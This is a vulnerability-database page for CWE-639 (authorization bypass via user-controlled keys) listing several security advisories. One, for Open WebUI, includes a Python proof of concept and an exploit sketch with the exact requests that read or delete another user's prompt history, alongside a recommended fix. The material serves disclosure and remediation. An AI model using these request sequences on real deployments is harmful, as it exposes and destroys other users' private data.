Common Weakness Enumeration

CWE-639

Allowed

Authorization Bypass Through User-Controlled Key

Abstraction: Base · Status: Incomplete

The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.

3220 vulnerabilities reference this CWE, most recent first.

GHSA-4R4M-V89P-5C69

Vulnerability from github – Published: 2024-08-03 18:30 – Updated: 2024-08-03 18:30
VLAI
Details

A vulnerability has been found in SimpleMachines SMF 2.1.4 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php?action=profile;u=2;area=showalerts;do=read of the component User Alert Read Status Handler. The manipulation of the argument aid leads to improper control of resource identifiers. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273523. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-7438"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639",
      "CWE-99"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-03T16:15:49Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in SimpleMachines SMF 2.1.4 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php?action=profile;u=2;area=showalerts;do=read of the component User Alert Read Status Handler. The manipulation of the argument aid leads to improper control of resource identifiers. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273523. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-4r4m-v89p-5c69",
  "modified": "2024-08-03T18:30:33Z",
  "published": "2024-08-03T18:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7438"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Fewword/Poc/blob/main/smf/smf-poc2.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.273523"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.273523"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.380190"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4R4W-2WGP-W7CJ

Vulnerability from github – Published: 2026-06-17 14:16 – Updated: 2026-06-17 14:16
VLAI
Summary
Open WebUI Prompt history IDOR: unbound history_id allows cross-prompt read and deletion
Details

Summary

Open WebUI's prompt version-history endpoints authorize the prompt_id in the URL but then act on caller-supplied history IDs without verifying that the history row belongs to that prompt (history_entry.prompt_id == prompt.id). Three operations are affected:

  • GET /api/v1/prompts/id/{prompt_id}/history/diff — returns another prompt's history snapshots (read).
  • POST /api/v1/prompts/id/{prompt_id}/update/version — restores another prompt's snapshot into the caller's prompt, exposing its content (read).
  • DELETE /api/v1/prompts/id/{prompt_id}/history/{history_id} — deletes another prompt's history entry (delete).

An authenticated user with access to any prompt they control, plus a victim prompt_history.id, can read or delete another user's private prompt history. The single-entry read endpoint (GET .../history/{history_id}) already enforces the binding; these three did not.

Impact

Security boundary crossed: prompt confidentiality and integrity.

Prompt history snapshots can contain private prompt text, internal instructions, and sensitive variables. With a known victim prompt_history.id, an attacker can read another user's snapshot (via the diff endpoint or by restoring it into their own prompt) and delete another user's history entry. The active prompt row is not destroyed; the delete impact is against version history. Exploitation requires knowing or obtaining victim history UUIDs, so severity depends on adjacent ID exposure.

Root Cause

The route checks read access only for prompt_id:

# backend/open_webui/routers/prompts.py
prompt = await Prompts.get_prompt_by_id(prompt_id, db=db)
...
if not (
    user.role == 'admin'
    or prompt.user_id == user.id
    or await AccessGrants.has_access(
        user_id=user.id,
        resource_type='prompt',
        resource_id=prompt.id,
        permission='read',
        db=db,
    )
):
    raise HTTPException(...)

But the authorized prompt ID is not passed into the diff sink:

# backend/open_webui/routers/prompts.py
diff = await PromptHistories.compute_diff(from_id, to_id, db=db)

compute_diff() fetches both history entries globally by ID and returns their full snapshots:

# backend/open_webui/models/prompt_history.py
result_from = await db.execute(select(PromptHistory).filter(PromptHistory.id == from_id))
from_entry = result_from.scalars().first()
result_to = await db.execute(select(PromptHistory).filter(PromptHistory.id == to_id))
to_entry = result_to.scalars().first()
...
return {
    'from_snapshot': from_snapshot,
    'to_snapshot': to_snapshot,
    ...
}

There is no check that from_entry.prompt_id == prompt_id or to_entry.prompt_id == prompt_id.

The same missing binding affects two further endpoints. POST .../update/version restores a snapshot fetched globally by version_id:

# backend/open_webui/models/prompts.py — update_prompt_version
history_entry = await PromptHistories.get_history_entry_by_id(version_id, db=session)
...
prompt.content = snapshot.get('content', prompt.content)   # foreign snapshot copied into caller's prompt
prompt.version_id = version_id

DELETE .../history/{history_id} deletes an entry fetched globally by history_id:

# backend/open_webui/models/prompt_history.py — delete_history_entry
result = await db.execute(select(PromptHistory).filter_by(id=history_id))
entry = result.scalars().first()
...
await db.delete(entry)

Neither checks entry.prompt_id == prompt.id. The single-entry read endpoint (GET .../history/{history_id}) does (history_entry.prompt_id != prompt.id → 404); these three endpoints were missing it.

PoC

#!/usr/bin/env python3
"""
PoC for prompt history diff IDOR.

The PoC executes:
  - the real routers.prompts.get_prompt_diff() route function
  - the real PromptHistories.compute_diff() implementation

Fake model/DB adapters are used only to avoid requiring a running server. The
security-sensitive behavior under test is that the route authorizes the prompt
ID in the URL, then computes a diff for arbitrary history IDs without checking
that those history rows belong to the authorized prompt.
"""

from __future__ import annotations

import asyncio
import json
import os
import sys
import types
from pathlib import Path
from types import SimpleNamespace


def prepare_imports() -> None:
    repo_root = Path(__file__).resolve().parents[1]
    sys.path.insert(0, str(repo_root / "backend"))
    os.environ["VECTOR_DB"] = "none"

    class DummyTyper:
        def command(self, *args, **kwargs):
            return lambda fn: fn

    sys.modules.setdefault(
        "typer",
        types.SimpleNamespace(
            Typer=lambda *args, **kwargs: DummyTyper(),
            Option=lambda *args, **kwargs: None,
            echo=lambda *args, **kwargs: None,
            Exit=Exception,
        ),
    )
    sys.modules.setdefault("uvicorn", types.SimpleNamespace(run=lambda *args, **kwargs: None))


class FakeScalarResult:
    def __init__(self, row):
        self.row = row

    def first(self):
        return self.row


class FakeExecuteResult:
    def __init__(self, row):
        self.row = row

    def scalars(self):
        return FakeScalarResult(self.row)


class FakePromptHistoryDb:
    def __init__(self, rows):
        self.rows = rows
        self.calls = 0

    async def execute(self, stmt):
        row = self.rows[self.calls]
        self.calls += 1
        return FakeExecuteResult(row)


class FakeDbContext:
    def __init__(self, db):
        self.db = db

    async def __aenter__(self):
        return self.db

    async def __aexit__(self, exc_type, exc, tb):
        return False


async def run_real_compute_diff(from_id: str, to_id: str):
    import open_webui.models.prompt_history as history_module

    victim_from = SimpleNamespace(
        id=from_id,
        prompt_id="victim-prompt",
        snapshot={
            "name": "Victim Prompt",
            "command": "/victim",
            "content": "PRIVATE_PROMPT_SECRET_V1",
        },
    )
    victim_to = SimpleNamespace(
        id=to_id,
        prompt_id="victim-prompt",
        snapshot={
            "name": "Victim Prompt",
            "command": "/victim",
            "content": "PRIVATE_PROMPT_SECRET_V2",
        },
    )

    fake_db = FakePromptHistoryDb([victim_from, victim_to])
    original_context = history_module.get_async_db_context
    try:
        history_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)
        diff = await history_module.PromptHistories.compute_diff(from_id, to_id)
    finally:
        history_module.get_async_db_context = original_context

    return diff


async def main() -> None:
    prepare_imports()

    import open_webui.routers.prompts as prompts_router

    attacker_prompt = SimpleNamespace(
        id="attacker-prompt",
        user_id="attacker",
    )
    attacker = SimpleNamespace(id="attacker", role="user")
    victim_from_id = "victim-history-from"
    victim_to_id = "victim-history-to"

    class FakePrompts:
        looked_up_prompt_ids = []

        async def get_prompt_by_id(self, prompt_id, db=None):
            self.looked_up_prompt_ids.append(prompt_id)
            if prompt_id == "attacker-prompt":
                return attacker_prompt
            return None

    class FakeAccessGrants:
        async def has_access(self, *args, **kwargs):
            return False

    class FakePromptHistories:
        compute_diff_calls = []

        async def compute_diff(self, from_id, to_id, db=None):
            self.compute_diff_calls.append(
                {
                    "from_id": from_id,
                    "to_id": to_id,
                    "authorized_prompt_id_not_passed": True,
                }
            )
            return await run_real_compute_diff(from_id, to_id)

    fake_prompts = FakePrompts()
    fake_histories = FakePromptHistories()

    original = {
        "Prompts": prompts_router.Prompts,
        "AccessGrants": prompts_router.AccessGrants,
        "PromptHistories": prompts_router.PromptHistories,
    }
    try:
        prompts_router.Prompts = fake_prompts
        prompts_router.AccessGrants = FakeAccessGrants()
        prompts_router.PromptHistories = fake_histories

        diff = await prompts_router.get_prompt_diff(
            prompt_id="attacker-prompt",
            from_id=victim_from_id,
            to_id=victim_to_id,
            user=attacker,
            db=None,
        )
    finally:
        for name, value in original.items():
            setattr(prompts_router, name, value)

    result = {
        "confirmed": (
            diff.get("from_snapshot", {}).get("content") == "PRIVATE_PROMPT_SECRET_V1"
            and diff.get("to_snapshot", {}).get("content") == "PRIVATE_PROMPT_SECRET_V2"
            and fake_prompts.looked_up_prompt_ids == ["attacker-prompt"]
            and fake_histories.compute_diff_calls
            and fake_histories.compute_diff_calls[0]["authorized_prompt_id_not_passed"] is True
        ),
        "attacker_user_id": "attacker",
        "authorized_prompt_id": "attacker-prompt",
        "victim_prompt_id": "victim-prompt",
        "victim_history_ids": [victim_from_id, victim_to_id],
        "prompt_ids_authorized_by_route": fake_prompts.looked_up_prompt_ids,
        "compute_diff_calls": fake_histories.compute_diff_calls,
        "leaked_from_snapshot": diff.get("from_snapshot"),
        "leaked_to_snapshot": diff.get("to_snapshot"),
        "source": {
            "route": "backend/open_webui/routers/prompts.py:get_prompt_diff",
            "sink": "backend/open_webui/models/prompt_history.py:PromptHistories.compute_diff",
        },
    }
    print(json.dumps(result, indent=2, sort_keys=True))
    if not result["confirmed"]:
        raise SystemExit(1)


if __name__ == "__main__":
    asyncio.run(main())

The PoC executes the real route function and the real PromptHistories.compute_diff() implementation with fake model/DB adapters. It authorizes the attacker against attacker-prompt, then supplies two victim history IDs. The route returns the victim prompt snapshots.

Result:

{
  "attacker_user_id": "attacker",
  "authorized_prompt_id": "attacker-prompt",
  "confirmed": true,
  "leaked_from_snapshot": {
    "command": "/victim",
    "content": "PRIVATE_PROMPT_SECRET_V1",
    "name": "Victim Prompt"
  },
  "leaked_to_snapshot": {
    "command": "/victim",
    "content": "PRIVATE_PROMPT_SECRET_V2",
    "name": "Victim Prompt"
  },
  "prompt_ids_authorized_by_route": [
    "attacker-prompt"
  ],
  "victim_history_ids": [
    "victim-history-from",
    "victim-history-to"
  ],
  "victim_prompt_id": "victim-prompt"
}

Exploit Sketch

Read via the diff endpoint:

  1. Attacker has read access to ATTACKER_PROMPT_ID.
  2. Attacker knows two history IDs for a victim prompt: VICTIM_FROM_HISTORY_ID and VICTIM_TO_HISTORY_ID.
  3. Attacker requests:
GET /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/diff?from_id=VICTIM_FROM_HISTORY_ID&to_id=VICTIM_TO_HISTORY_ID
  1. The server authorizes ATTACKER_PROMPT_ID, then returns snapshots for the victim history IDs.

Read via restore (update/version): the attacker POSTs {"version_id": "VICTIM_HISTORY_ID"} to their own prompt's update/version, then GETs their prompt; it now holds the victim snapshot's name/content/data/meta/tags.

Delete: the attacker sends DELETE /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/VICTIM_HISTORY_ID; the victim history entry is removed.

Recommended Fix

Bind every prompt-history operation to the authorized prompt before acting on a history ID, mirroring the single-entry read endpoint:

  • compute_diff() should accept prompt_id and query both entries with PromptHistory.prompt_id == prompt_id alongside the id filter.
  • delete_history_entry() should accept prompt_id and filter filter_by(id=history_id, prompt_id=prompt_id).
  • update_prompt_version() should reject history_entry.prompt_id != prompt_id before restoring.

Return 404/403 on mismatch.

Consolidation

Per our Report Handling policy this consolidates independent reports of the same prompt-history authorization flaw (one missing history_entry.prompt_id == prompt.id binding) reached through different endpoints:

  • Diff-endpoint read and history deletion: @0xEr3n (earliest filings).
  • update/version restore-read: distinct path demonstrated by @5yu4n.

One CVE for the consolidated advisory.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.5"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-17T14:16:50Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nOpen WebUI\u0027s prompt version-history endpoints authorize the `prompt_id` in the URL but then act on caller-supplied history IDs without verifying that the history row belongs to that prompt (`history_entry.prompt_id == prompt.id`). Three operations are affected:\n\n- `GET /api/v1/prompts/id/{prompt_id}/history/diff` \u2014 returns another prompt\u0027s history snapshots (read).\n- `POST /api/v1/prompts/id/{prompt_id}/update/version` \u2014 restores another prompt\u0027s snapshot into the caller\u0027s prompt, exposing its content (read).\n- `DELETE /api/v1/prompts/id/{prompt_id}/history/{history_id}` \u2014 deletes another prompt\u0027s history entry (delete).\n\nAn authenticated user with access to any prompt they control, plus a victim `prompt_history.id`, can read or delete another user\u0027s private prompt history. The single-entry read endpoint (`GET .../history/{history_id}`) already enforces the binding; these three did not.\n\n## Impact\n\nSecurity boundary crossed: prompt confidentiality and integrity.\n\nPrompt history snapshots can contain private prompt text, internal instructions, and sensitive variables. With a known victim `prompt_history.id`, an attacker can read another user\u0027s snapshot (via the diff endpoint or by restoring it into their own prompt) and delete another user\u0027s history entry. The active prompt row is not destroyed; the delete impact is against version history. Exploitation requires knowing or obtaining victim history UUIDs, so severity depends on adjacent ID exposure.\n\n## Root Cause\n\nThe route checks read access only for `prompt_id`:\n\n```python\n# backend/open_webui/routers/prompts.py\nprompt = await Prompts.get_prompt_by_id(prompt_id, db=db)\n...\nif not (\n    user.role == \u0027admin\u0027\n    or prompt.user_id == user.id\n    or await AccessGrants.has_access(\n        user_id=user.id,\n        resource_type=\u0027prompt\u0027,\n        resource_id=prompt.id,\n        permission=\u0027read\u0027,\n        db=db,\n    )\n):\n    raise HTTPException(...)\n```\n\nBut the authorized prompt ID is not passed into the diff sink:\n\n```python\n# backend/open_webui/routers/prompts.py\ndiff = await PromptHistories.compute_diff(from_id, to_id, db=db)\n```\n\n`compute_diff()` fetches both history entries globally by ID and returns their full snapshots:\n\n```python\n# backend/open_webui/models/prompt_history.py\nresult_from = await db.execute(select(PromptHistory).filter(PromptHistory.id == from_id))\nfrom_entry = result_from.scalars().first()\nresult_to = await db.execute(select(PromptHistory).filter(PromptHistory.id == to_id))\nto_entry = result_to.scalars().first()\n...\nreturn {\n    \u0027from_snapshot\u0027: from_snapshot,\n    \u0027to_snapshot\u0027: to_snapshot,\n    ...\n}\n```\n\nThere is no check that `from_entry.prompt_id == prompt_id` or `to_entry.prompt_id == prompt_id`.\n\nThe same missing binding affects two further endpoints. `POST .../update/version` restores a snapshot fetched globally by `version_id`:\n\n```python\n# backend/open_webui/models/prompts.py \u2014 update_prompt_version\nhistory_entry = await PromptHistories.get_history_entry_by_id(version_id, db=session)\n...\nprompt.content = snapshot.get(\u0027content\u0027, prompt.content)   # foreign snapshot copied into caller\u0027s prompt\nprompt.version_id = version_id\n```\n\n`DELETE .../history/{history_id}` deletes an entry fetched globally by `history_id`:\n\n```python\n# backend/open_webui/models/prompt_history.py \u2014 delete_history_entry\nresult = await db.execute(select(PromptHistory).filter_by(id=history_id))\nentry = result.scalars().first()\n...\nawait db.delete(entry)\n```\n\nNeither checks `entry.prompt_id == prompt.id`. The single-entry read endpoint (`GET .../history/{history_id}`) does (`history_entry.prompt_id != prompt.id \u2192 404`); these three endpoints were missing it.\n\n## PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC for prompt history diff IDOR.\n\nThe PoC executes:\n  - the real routers.prompts.get_prompt_diff() route function\n  - the real PromptHistories.compute_diff() implementation\n\nFake model/DB adapters are used only to avoid requiring a running server. The\nsecurity-sensitive behavior under test is that the route authorizes the prompt\nID in the URL, then computes a diff for arbitrary history IDs without checking\nthat those history rows belong to the authorized prompt.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport json\nimport os\nimport sys\nimport types\nfrom pathlib import Path\nfrom types import SimpleNamespace\n\n\ndef prepare_imports() -\u003e None:\n    repo_root = Path(__file__).resolve().parents[1]\n    sys.path.insert(0, str(repo_root / \"backend\"))\n    os.environ[\"VECTOR_DB\"] = \"none\"\n\n    class DummyTyper:\n        def command(self, *args, **kwargs):\n            return lambda fn: fn\n\n    sys.modules.setdefault(\n        \"typer\",\n        types.SimpleNamespace(\n            Typer=lambda *args, **kwargs: DummyTyper(),\n            Option=lambda *args, **kwargs: None,\n            echo=lambda *args, **kwargs: None,\n            Exit=Exception,\n        ),\n    )\n    sys.modules.setdefault(\"uvicorn\", types.SimpleNamespace(run=lambda *args, **kwargs: None))\n\n\nclass FakeScalarResult:\n    def __init__(self, row):\n        self.row = row\n\n    def first(self):\n        return self.row\n\n\nclass FakeExecuteResult:\n    def __init__(self, row):\n        self.row = row\n\n    def scalars(self):\n        return FakeScalarResult(self.row)\n\n\nclass FakePromptHistoryDb:\n    def __init__(self, rows):\n        self.rows = rows\n        self.calls = 0\n\n    async def execute(self, stmt):\n        row = self.rows[self.calls]\n        self.calls += 1\n        return FakeExecuteResult(row)\n\n\nclass FakeDbContext:\n    def __init__(self, db):\n        self.db = db\n\n    async def __aenter__(self):\n        return self.db\n\n    async def __aexit__(self, exc_type, exc, tb):\n        return False\n\n\nasync def run_real_compute_diff(from_id: str, to_id: str):\n    import open_webui.models.prompt_history as history_module\n\n    victim_from = SimpleNamespace(\n        id=from_id,\n        prompt_id=\"victim-prompt\",\n        snapshot={\n            \"name\": \"Victim Prompt\",\n            \"command\": \"/victim\",\n            \"content\": \"PRIVATE_PROMPT_SECRET_V1\",\n        },\n    )\n    victim_to = SimpleNamespace(\n        id=to_id,\n        prompt_id=\"victim-prompt\",\n        snapshot={\n            \"name\": \"Victim Prompt\",\n            \"command\": \"/victim\",\n            \"content\": \"PRIVATE_PROMPT_SECRET_V2\",\n        },\n    )\n\n    fake_db = FakePromptHistoryDb([victim_from, victim_to])\n    original_context = history_module.get_async_db_context\n    try:\n        history_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)\n        diff = await history_module.PromptHistories.compute_diff(from_id, to_id)\n    finally:\n        history_module.get_async_db_context = original_context\n\n    return diff\n\n\nasync def main() -\u003e None:\n    prepare_imports()\n\n    import open_webui.routers.prompts as prompts_router\n\n    attacker_prompt = SimpleNamespace(\n        id=\"attacker-prompt\",\n        user_id=\"attacker\",\n    )\n    attacker = SimpleNamespace(id=\"attacker\", role=\"user\")\n    victim_from_id = \"victim-history-from\"\n    victim_to_id = \"victim-history-to\"\n\n    class FakePrompts:\n        looked_up_prompt_ids = []\n\n        async def get_prompt_by_id(self, prompt_id, db=None):\n            self.looked_up_prompt_ids.append(prompt_id)\n            if prompt_id == \"attacker-prompt\":\n                return attacker_prompt\n            return None\n\n    class FakeAccessGrants:\n        async def has_access(self, *args, **kwargs):\n            return False\n\n    class FakePromptHistories:\n        compute_diff_calls = []\n\n        async def compute_diff(self, from_id, to_id, db=None):\n            self.compute_diff_calls.append(\n                {\n                    \"from_id\": from_id,\n                    \"to_id\": to_id,\n                    \"authorized_prompt_id_not_passed\": True,\n                }\n            )\n            return await run_real_compute_diff(from_id, to_id)\n\n    fake_prompts = FakePrompts()\n    fake_histories = FakePromptHistories()\n\n    original = {\n        \"Prompts\": prompts_router.Prompts,\n        \"AccessGrants\": prompts_router.AccessGrants,\n        \"PromptHistories\": prompts_router.PromptHistories,\n    }\n    try:\n        prompts_router.Prompts = fake_prompts\n        prompts_router.AccessGrants = FakeAccessGrants()\n        prompts_router.PromptHistories = fake_histories\n\n        diff = await prompts_router.get_prompt_diff(\n            prompt_id=\"attacker-prompt\",\n            from_id=victim_from_id,\n            to_id=victim_to_id,\n            user=attacker,\n            db=None,\n        )\n    finally:\n        for name, value in original.items():\n            setattr(prompts_router, name, value)\n\n    result = {\n        \"confirmed\": (\n            diff.get(\"from_snapshot\", {}).get(\"content\") == \"PRIVATE_PROMPT_SECRET_V1\"\n            and diff.get(\"to_snapshot\", {}).get(\"content\") == \"PRIVATE_PROMPT_SECRET_V2\"\n            and fake_prompts.looked_up_prompt_ids == [\"attacker-prompt\"]\n            and fake_histories.compute_diff_calls\n            and fake_histories.compute_diff_calls[0][\"authorized_prompt_id_not_passed\"] is True\n        ),\n        \"attacker_user_id\": \"attacker\",\n        \"authorized_prompt_id\": \"attacker-prompt\",\n        \"victim_prompt_id\": \"victim-prompt\",\n        \"victim_history_ids\": [victim_from_id, victim_to_id],\n        \"prompt_ids_authorized_by_route\": fake_prompts.looked_up_prompt_ids,\n        \"compute_diff_calls\": fake_histories.compute_diff_calls,\n        \"leaked_from_snapshot\": diff.get(\"from_snapshot\"),\n        \"leaked_to_snapshot\": diff.get(\"to_snapshot\"),\n        \"source\": {\n            \"route\": \"backend/open_webui/routers/prompts.py:get_prompt_diff\",\n            \"sink\": \"backend/open_webui/models/prompt_history.py:PromptHistories.compute_diff\",\n        },\n    }\n    print(json.dumps(result, indent=2, sort_keys=True))\n    if not result[\"confirmed\"]:\n        raise SystemExit(1)\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\nThe PoC executes the real route function and the real `PromptHistories.compute_diff()` implementation with fake model/DB adapters. It authorizes the attacker against `attacker-prompt`, then supplies two victim history IDs. The route returns the victim prompt snapshots.\n\nResult:\n\n```json\n{\n  \"attacker_user_id\": \"attacker\",\n  \"authorized_prompt_id\": \"attacker-prompt\",\n  \"confirmed\": true,\n  \"leaked_from_snapshot\": {\n    \"command\": \"/victim\",\n    \"content\": \"PRIVATE_PROMPT_SECRET_V1\",\n    \"name\": \"Victim Prompt\"\n  },\n  \"leaked_to_snapshot\": {\n    \"command\": \"/victim\",\n    \"content\": \"PRIVATE_PROMPT_SECRET_V2\",\n    \"name\": \"Victim Prompt\"\n  },\n  \"prompt_ids_authorized_by_route\": [\n    \"attacker-prompt\"\n  ],\n  \"victim_history_ids\": [\n    \"victim-history-from\",\n    \"victim-history-to\"\n  ],\n  \"victim_prompt_id\": \"victim-prompt\"\n}\n```\n\n## Exploit Sketch\n\nRead via the diff endpoint:\n\n1. Attacker has read access to `ATTACKER_PROMPT_ID`.\n2. Attacker knows two history IDs for a victim prompt: `VICTIM_FROM_HISTORY_ID` and `VICTIM_TO_HISTORY_ID`.\n3. Attacker requests:\n\n```text\nGET /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/diff?from_id=VICTIM_FROM_HISTORY_ID\u0026to_id=VICTIM_TO_HISTORY_ID\n```\n\n4. The server authorizes `ATTACKER_PROMPT_ID`, then returns snapshots for the victim history IDs.\n\nRead via restore (`update/version`): the attacker `POST`s `{\"version_id\": \"VICTIM_HISTORY_ID\"}` to their own prompt\u0027s `update/version`, then `GET`s their prompt; it now holds the victim snapshot\u0027s name/content/data/meta/tags.\n\nDelete: the attacker sends `DELETE /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/VICTIM_HISTORY_ID`; the victim history entry is removed.\n\n## Recommended Fix\n\nBind every prompt-history operation to the authorized prompt before acting on a history ID, mirroring the single-entry read endpoint:\n\n- `compute_diff()` should accept `prompt_id` and query both entries with `PromptHistory.prompt_id == prompt_id` alongside the id filter.\n- `delete_history_entry()` should accept `prompt_id` and filter `filter_by(id=history_id, prompt_id=prompt_id)`.\n- `update_prompt_version()` should reject `history_entry.prompt_id != prompt_id` before restoring.\n\nReturn 404/403 on mismatch.\n\n## Consolidation\n\nPer our Report Handling policy this consolidates independent reports of the same prompt-history authorization flaw (one missing `history_entry.prompt_id == prompt.id` binding) reached through different endpoints:\n\n- Diff-endpoint read and history deletion: @0xEr3n (earliest filings).\n- `update/version` restore-read: distinct path demonstrated by @5yu4n.\n\nOne CVE for the consolidated advisory.",
  "id": "GHSA-4r4w-2wgp-w7cj",
  "modified": "2026-06-17T14:16:50Z",
  "published": "2026-06-17T14:16:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4r4w-2wgp-w7cj"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI Prompt history IDOR: unbound history_id allows cross-prompt read and deletion"
}

GHSA-4R8H-RJJ8-X3W5

Vulnerability from github – Published: 2023-09-14 03:30 – Updated: 2024-04-04 07:39
VLAI
Details

The OData service of the S4 HANA (Manage checkbook apps) - versions 102, 103, 104, 105, 106, 107, allows an attacker to change the checkbook name by simulating an update OData call.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-41368"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-12T02:15:12Z",
    "severity": "MODERATE"
  },
  "details": "The OData service of the S4 HANA (Manage checkbook apps) - versions 102, 103, 104, 105, 106, 107, allows an attacker to change the checkbook name by simulating an update OData call.\n\n",
  "id": "GHSA-4r8h-rjj8-x3w5",
  "modified": "2024-04-04T07:39:48Z",
  "published": "2023-09-14T03:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41368"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3355675"
    },
    {
      "type": "WEB",
      "url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RCQ-F44J-G333

Vulnerability from github – Published: 2023-07-18 18:30 – Updated: 2024-04-04 06:14
VLAI
Details

Iagona ScrutisWeb versions 2.1.37 and prior are vulnerable to an insecure direct object reference vulnerability that could allow an unauthenticated user to view profile information, including user login names and encrypted passwords.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-38257"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-18T18:15:12Z",
    "severity": "HIGH"
  },
  "details": "Iagona ScrutisWeb versions 2.1.37 and prior are vulnerable to an insecure direct object reference vulnerability that could allow an unauthenticated user to view profile information, including user login names and encrypted passwords.",
  "id": "GHSA-4rcq-f44j-g333",
  "modified": "2024-04-04T06:14:19Z",
  "published": "2023-07-18T18:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38257"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-199-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RMH-5MVP-V2G7

Vulnerability from github – Published: 2026-04-08 09:31 – Updated: 2026-04-14 15:30
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in dFactory Download Attachments download-attachments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download Attachments: from n/a through <= 1.4.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-39616"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-08T09:16:31Z",
    "severity": "MODERATE"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in dFactory Download Attachments download-attachments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download Attachments: from n/a through \u003c= 1.4.0.",
  "id": "GHSA-4rmh-5mvp-v2g7",
  "modified": "2026-04-14T15:30:29Z",
  "published": "2026-04-08T09:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39616"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/download-attachments/vulnerability/wordpress-download-attachments-plugin-1-4-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4V4P-87M3-5423

Vulnerability from github – Published: 2022-07-09 00:00 – Updated: 2022-07-20 01:32
VLAI
Summary
Known v1.3.1 contains Insecure Direct Object Reference
Details

